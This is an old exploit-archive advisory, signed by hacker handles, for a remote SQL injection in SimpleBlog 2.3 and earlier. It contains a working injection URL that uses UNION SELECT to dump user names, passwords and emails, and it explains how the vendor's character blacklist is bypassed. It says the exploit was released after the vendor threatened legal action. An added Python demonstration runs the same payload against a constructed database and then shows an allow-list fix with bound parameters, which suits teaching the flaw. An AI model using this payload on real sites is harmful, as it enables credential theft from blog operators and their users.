       _           _        
__   _(_)_ __  ___| |_ __ _ 
\ \ / / | '_ \/ __| __/ _` |
 \ V /| | |_) \__ \ || (_| |
  \_/ |_| .__/|___/\__\__,_|
        |_|                 AnD

                         _               _    _ _ _     
 _ __ ___  _   _ _ __ __| | ___ _ __ ___| | _(_) | |____
| '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_  /
| | | | | | |_| | | | (_| |  __/ |  \__ \   <| | | |/ / 
|_| |_| |_|\__,_|_|  \__,_|\___|_|  |___/_|\_\_|_|_/___|

+-----------------------------------------------------------------+
| Vipsta & MurderSkillz fucking pwnt this webApp                  |
+-----------------------------------------------------------------+
| App Name: SimpleBlog 2.3                                        |
| App Author: 8pixel.net                                          |
| App Version: <= 2.3                                             |
| App Type: Blog/Journal                                          |
+-----------------------------------------------------------------+
| DETAILS                                                         |
+-----------------------------------------------------------------+
| Vulnerability: Remote SQL Injection                             |
| Requirements: Database with UNION support                       |
| Revisions: Note - This is a revision of another vuln            |
|                   posted by Chironex Fleckeri                   |
+-----------------------------------------------------------------+
| CODE                                                            |
+-----------------------------------------------------------------+
| Vendor "implemented" a fix for SQL injection vulnerabilities.   |
| However, this bullshit was easily worked around by              |
| Vipsta & MurderSkillz.                                          |
|                                                                 |
| Vendor attempted to remove illegal characters like ' and =      |
| which stop most SQL injection vulnerabilities. However:         |
| Vendor failed to remove the '>' symbol.                         |
+-----------------------------------------------------------------+
| EXPLOIT                                                         |
+-----------------------------------------------------------------+
| SQL Injection String:                                           |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| TIMELINE                                                        |
+-----------------------------------------------------------------+
| 9/2/06 - Vendor Notified.                                       |
| 9/2/06 - Vendor Replied. Threatens legal action.                |
| 9/4/06 - Exploit Released with no details to vendor.            |
+-----------------------------------------------------------------+
| SHOUTZ                                                          |
+-----------------------------------------------------------------+
| Everyone at g00ns.net - including:                              |
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo,             |
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot,             |
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be,        |
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot!         |
+-----------------------------------------------------------------+
| ADDITIONAL NOTES                                                |
+-----------------------------------------------------------------+
| TeamSpeak: ts.g00ns.net                                         |
| IRC: irc.g00ns.net                                              |
+-----------------------------------------------------------------+
| PERSONAL STUFF                                                  |
+-----------------------------------------------------------------+
| Sess from g00ns.net IS A FUCKING MORON.                         |
+-----------------------------------------------------------------+
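The blacklist weakness the CODE section describes, shown as an added example that is not the vendor's or the authors' code: a stand-in filter that strips only ' and = passes the advisory's id payload through untouched, whereas a digits-only allow-list plus a bound parameter rejects it. The SQLite in-memory database, the table layouts and the sample rows are constructed for the demonstration.

```python
import re
import sqlite3

# Constructed stand-in for the vendor's blacklist as the advisory describes it:
# it strips ' and = but leaves > alone. This is not the vendor's actual code.
def vendor_blacklist(value: str) -> str:
    return value.replace("'", "").replace("=", "")

# The id parameter from the advisory's exploit URL, URL-decoded.
PAYLOAD_ID = ("-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,"
              "uDATECREATED,null,null,null FROM T_USERS WHERE id>1")

def demo_db() -> sqlite3.Connection:
    """Constructed schema: T_LINKS gets 9 columns so the 9-column UNION lines up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE T_LINKS (ID, c1, c2, c3, c4, c5, c6, c7, c8);
        CREATE TABLE T_USERS (ID, uFULLNAME, uUSERNAME, uPASSWORD,
                              uEMAIL, uDATECREATED);
        INSERT INTO T_LINKS VALUES (1, 'post', '', '', '', '', '', '', '');
        INSERT INTO T_USERS VALUES (2, 'Site Admin', 'admin', 'h4sh', 'a@b', '2006');
    """)
    return conn

def vulnerable_fetch(conn, raw_id):
    """Blacklist then string concatenation: the pattern the advisory bypasses.
    Neither ' nor = is needed, so the filter returns the payload unchanged."""
    sql = "SELECT * FROM T_LINKS WHERE ID=" + vendor_blacklist(raw_id)
    return conn.execute(sql).fetchall()

# Allow-list fix (hypothetical, not the vendor's): a post id is digits only.
_ID_RE = re.compile(r"[0-9]+")

def is_valid_id(raw_id):
    return _ID_RE.fullmatch(raw_id) is not None

def hardened_fetch(conn, raw_id):
    """Validate the type, then bind the value; no SQL text is built from input."""
    if not is_valid_id(raw_id):
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT * FROM T_LINKS WHERE ID = ?",
                        (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = demo_db()
    print(vulnerable_fetch(db, PAYLOAD_ID))   # the T_USERS row leaks
    print(hardened_fetch(db, "1"))            # the legitimate post
    try:
        hardened_fetch(db, PAYLOAD_ID)
    except ValueError as err:
        print("rejected:", err)
```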

            __ 
  ___  ___ / _|
 / _ \/ _ \| |_ 
|  __/ (_) |  _|
 \___|\___/|_|.

# milw0rm.com [2006-09-04]